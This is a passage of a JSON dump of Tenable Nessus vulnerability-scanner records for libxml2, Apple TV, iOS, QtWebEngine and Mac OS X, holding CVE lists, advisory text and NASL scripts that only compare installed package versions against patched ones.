preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"libxml2-2.9.4-2.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:07:56", "description": "The remote host is affected by the vulnerability described in GLSA-201701-37 (libxml2: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in libxml2. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user or automated system to process a specially crafted XML document, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-01-17T00:00:00", "type": "nessus", "title": "GLSA-201701-37 : libxml2: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1819", "CVE-2015-5312", "CVE-2015-7497", "CVE-2015-7498", "CVE-2015-7499", "CVE-2015-7500", "CVE-2015-7941", "CVE-2015-7942", "CVE-2015-8035", "CVE-2015-8242", "CVE-2015-8806", "CVE-2016-1836", "CVE-2016-1838", "CVE-2016-1839", "CVE-2016-1840", "CVE-2016-2073", "CVE-2016-3627", "CVE-2016-3705", "CVE-2016-4483", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:libxml2", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201701-37.NASL", "href": "https://www.tenable.com/plugins/nessus/96541", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-37.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96541);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1819\", \"CVE-2015-5312\", \"CVE-2015-7497\", \"CVE-2015-7498\", \"CVE-2015-7499\", \"CVE-2015-7500\", \"CVE-2015-7941\", \"CVE-2015-7942\", \"CVE-2015-8035\", \"CVE-2015-8242\", \"CVE-2015-8806\", \"CVE-2016-1836\", \"CVE-2016-1838\", \"CVE-2016-1839\", \"CVE-2016-1840\", \"CVE-2016-2073\", \"CVE-2016-3627\", \"CVE-2016-3705\", \"CVE-2016-4483\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"GLSA\", value:\"201701-37\");\n\n script_name(english:\"GLSA-201701-37 : libxml2: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-37\n(libxml2: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in libxml2. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user or automated system to process a\n specially crafted XML document, possibly resulting in execution of\n arbitrary code with the privileges of the process or a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201701-37\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libxml2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/libxml2-2.9.4-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/libxml2\", unaffected:make_list(\"ge 2.9.4-r1\"), vulnerable:make_list(\"lt 2.9.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:05", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10. 
It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Audio\n - CFNetwork\n - CoreCrypto\n - FontParser\n - IOAcceleratorFamily\n - Kernel\n - libxml2\n - libxslt\n - Security\n - WebKit\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "nessus", "title": "Apple TV < 10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4611", "CVE-2016-4658", "CVE-2016-4702", "CVE-2016-4708", "CVE-2016-4712", "CVE-2016-4718", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4728", "CVE-2016-4730", "CVE-2016-4733", "CVE-2016-4734", "CVE-2016-4735", "CVE-2016-4737", "CVE-2016-4738", "CVE-2016-4753", "CVE-2016-4759", "CVE-2016-4765", "CVE-2016-4766", "CVE-2016-4767", "CVE-2016-4768", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-5131"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10.NASL", "href": "https://www.tenable.com/plugins/nessus/93776", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93776);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-4611\",\n \"CVE-2016-4658\",\n \"CVE-2016-4702\",\n \"CVE-2016-4708\",\n \"CVE-2016-4712\",\n \"CVE-2016-4718\",\n \"CVE-2016-4725\",\n \"CVE-2016-4726\",\n \"CVE-2016-4728\",\n \"CVE-2016-4730\",\n \"CVE-2016-4733\",\n \"CVE-2016-4734\",\n \"CVE-2016-4735\",\n \"CVE-2016-4737\",\n \"CVE-2016-4738\",\n \"CVE-2016-4753\",\n \"CVE-2016-4759\",\n \"CVE-2016-4765\",\n \"CVE-2016-4766\",\n \"CVE-2016-4767\",\n \"CVE-2016-4768\",\n \"CVE-2016-4772\",\n \"CVE-2016-4773\",\n \"CVE-2016-4774\",\n \"CVE-2016-4775\",\n \"CVE-2016-4776\",\n \"CVE-2016-4777\",\n \"CVE-2016-4778\",\n \"CVE-2016-5131\"\n );\n script_bugtraq_id(\n 92053,\n 93054,\n 
93057,\n 93059,\n 93063,\n 93064,\n 93065,\n 93067\n );\n\n script_name(english:\"Apple TV < 10 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - Audio\n - CFNetwork\n - CoreCrypto\n - FontParser\n - IOAcceleratorFamily\n - Kernel\n - libxml2\n - libxslt\n - Security\n - WebKit\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207142\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10 or later. Note that this update is only\navailable for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4702\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14T330\";\ntvos_ver = '10';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:11", "description": "The version of iOS running on the mobile device is prior to 10.0, and is affected by multiple vulnerabilities in the following components :\n\n - AppleMobileFileIntegrity (CVE-2016-4698)\n - Assets (CVE-2016-4741)\n - Audio (CVE-2016-4702)\n - CFNetwork (CVE-2016-4707, CVE-2016-4708)\n - CommonCrypto (CVE-2016-4711, CVE-2016-4712)\n - FontParser (CVE-2016-4718)\n - GeoServices (CVE-2016-4719)\n - IDS - Connectivity (CVE-2016-4722)\n - IOAcceleratorFamily (CVE-2016-4724, CVE-2016-4725, CVE-2016-4726)\n - Kernel (CVE-2016-4771, CVE-2016-4772, CVE-2016-4773, CVE-2016-4774, CVE-2016-4776, CVE-2016-4777, CVE-2016-4778)\n - Keyboards 
(CVE-2016-4746)\n - libxml2 (CVE-2016-4658, CVE-2016-5131)\n - libxslt (CVE-2016-4738)\n - Mail (CVE-2016-4747)\n - Messages (CVE-2016-4740)\n - Printing UIKit (CVE-2016-4749)\n - S2 Camera (CVE-2016-4750)\n - Safari Reader (CVE-2016-4618)\n - Sandbox Profiles (CVE-2016-4620)\n - Security (CVE-2016-4753)\n - Springboard (CVE-2016-7759)\n - WebKit (CVE-2016-4728, CVE-2016-4758, CVE-2016-4611, CVE-2016-4729, CVE-2016-4730, CVE-2016-4731, CVE-2016-4734, CVE-2016-4735, CVE-2016-4737, CVE-2016-4759, CVE-2016-4762, CVE-2016-4766, CVE-2016-4767, CVE-2016-4768, CVE-2016-4760, CVE-2016-4733, CVE-2016-4765, CVE-2016-4763)", "cvss3": {}, "published": "2016-10-03T00:00:00", "type": "nessus", "title": "Apple iOS < 10.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4611", "CVE-2016-4618", "CVE-2016-4620", "CVE-2016-4658", "CVE-2016-4698", "CVE-2016-4702", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4718", "CVE-2016-4719", "CVE-2016-4722", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4728", "CVE-2016-4729", "CVE-2016-4730", "CVE-2016-4731", "CVE-2016-4733", "CVE-2016-4734", "CVE-2016-4735", "CVE-2016-4737", "CVE-2016-4738", "CVE-2016-4740", "CVE-2016-4741", "CVE-2016-4746", "CVE-2016-4747", "CVE-2016-4749", "CVE-2016-4750", "CVE-2016-4753", "CVE-2016-4758", "CVE-2016-4759", "CVE-2016-4760", "CVE-2016-4762", "CVE-2016-4763", "CVE-2016-4765", "CVE-2016-4766", "CVE-2016-4767", "CVE-2016-4768", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-5131", "CVE-2016-7759"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "9619.PRM", "href": "https://www.tenable.com/plugins/nnm/9619", "sourceData": "Binary data 9619.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:17", "description": "This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS (long-term 
support) branch. This is a snapshot of the QtWebEngine that will be included in the bugfix and security release Qt 5.6.3, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155, CVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171, CVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186, CVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214, CVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652, CVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009, CVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016, CVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024, CVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029, CVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046, CVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050, CVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062, CVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078, CVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in QtWebEngine 5.7.x) with security fixes from Chromium up to version 59.0.3071.104. (5.6.2 was based on Chromium 45.0.2554.101 with security fixes from Chromium up to version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been backported.\n\nSee http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.6 for details. (Please note that at the time of this writing, not all security backports are listed in that file yet. 
The list above is accurate.)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "Fedora 24 : qt5-qtwebengine (2017-98bed96d12)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5078", "CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652", "CVE-2017-5006", "CVE-2017-5007", "CVE-2017-5008", "CVE-2017-5009", "CVE-2017-5010", "CVE-2017-5012", "CVE-2017-5015", "CVE-2017-5016", "CVE-2017-5017", "CVE-2017-5019", "CVE-2017-5023", "CVE-2017-5024", "CVE-2017-5025", "CVE-2017-5026", "CVE-2017-5027", "CVE-2017-5029", "CVE-2017-5033", "CVE-2017-5037", "CVE-2017-5044", "CVE-2017-5046", "CVE-2017-5047", "CVE-2017-5048", "CVE-2017-5049", "CVE-2017-5050", "CVE-2017-5051", "CVE-2017-5059", "CVE-2017-5061", "CVE-2017-5062", "CVE-2017-5065", "CVE-2017-5067", "CVE-2017-5069", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5083", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-98BED96D12.NASL", "href": "https://www.tenable.com/plugins/nessus/101920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-98bed96d12.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101920);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2016-5078\",\n \"CVE-2016-5133\",\n \"CVE-2016-5147\",\n \"CVE-2016-5153\",\n \"CVE-2016-5155\",\n \"CVE-2016-5161\",\n \"CVE-2016-5166\",\n \"CVE-2016-5170\",\n \"CVE-2016-5171\",\n \"CVE-2016-5172\",\n \"CVE-2016-5181\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5192\",\n \"CVE-2016-5198\",\n \"CVE-2016-5205\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\",\n \"CVE-2017-5006\",\n \"CVE-2017-5007\",\n \"CVE-2017-5008\",\n \"CVE-2017-5009\",\n \"CVE-2017-5010\",\n \"CVE-2017-5012\",\n \"CVE-2017-5015\",\n \"CVE-2017-5016\",\n \"CVE-2017-5017\",\n \"CVE-2017-5019\",\n \"CVE-2017-5023\",\n \"CVE-2017-5024\",\n \"CVE-2017-5025\",\n \"CVE-2017-5026\",\n \"CVE-2017-5027\",\n \"CVE-2017-5029\",\n \"CVE-2017-5033\",\n \"CVE-2017-5037\",\n \"CVE-2017-5044\",\n \"CVE-2017-5046\",\n \"CVE-2017-5047\",\n \"CVE-2017-5048\",\n \"CVE-2017-5049\",\n \"CVE-2017-5050\",\n \"CVE-2017-5051\",\n \"CVE-2017-5059\",\n \"CVE-2017-5061\",\n \"CVE-2017-5062\",\n \"CVE-2017-5065\",\n \"CVE-2017-5067\",\n \"CVE-2017-5069\",\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5083\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 24 : qt5-qtwebengine (2017-98bed96d12)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS\n(long-term support) branch. This is a snapshot of the QtWebEngine that\nwill be included in the bugfix and security release Qt 5.6.3, but only\nthe QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155,\nCVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171,\nCVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186,\nCVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224,\nCVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652,\nCVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009,\nCVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016,\nCVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024,\nCVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029,\nCVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046,\nCVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050,\nCVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062,\nCVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070,\nCVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078,\nCVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in\n QtWebEngine 5.7.x) with security fixes from Chromium up\n to version 59.0.3071.104. (5.6.2 was based on Chromium\n 45.0.2554.101 with security fixes from Chromium up to\n version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been\n backported.\n\nSee\nhttp://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all\nsecurity backports are listed in that file yet. 
The list above is\naccurate.)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n # http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.6\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfc84d1b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-98bed96d12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"qt5-qtwebengine-5.6.3-0.1.20170712gitee719ad313e564.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:39", "description": "The remote host is running a version of Mac OS X that is prior to 10.10.5, 10.11.x prior to 10.11.6, or is not macOS 10.12. 
It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache\n - apache_mod_php\n - Apple HSSPI Support\n - AppleEFIRuntime\n - AppleMobileFileIntegrity\n - AppleUCC\n - Application Firewall\n - ATS\n - Audio\n - Bluetooth\n - cd9660\n - CFNetwork\n - CommonCrypto\n - CoreCrypto\n - CoreDisplay\n - curl\n - Date & Time Pref Pane\n - DiskArbitration\n - File Bookmark\n - FontParser\n - IDS - Connectivity\n - ImageIO\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOThunderboltFamily\n - Kerberos v5 PAM module\n - Kernel\n - libarchive\n - libxml2\n - libxpc\n - libxslt\n - mDNSResponder\n - NSSecureTextField\n - Perl\n - S2 Camera\n - Security\n - Terminal\n - WindowServer\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {}, "published": "2016-09-23T00:00:00", 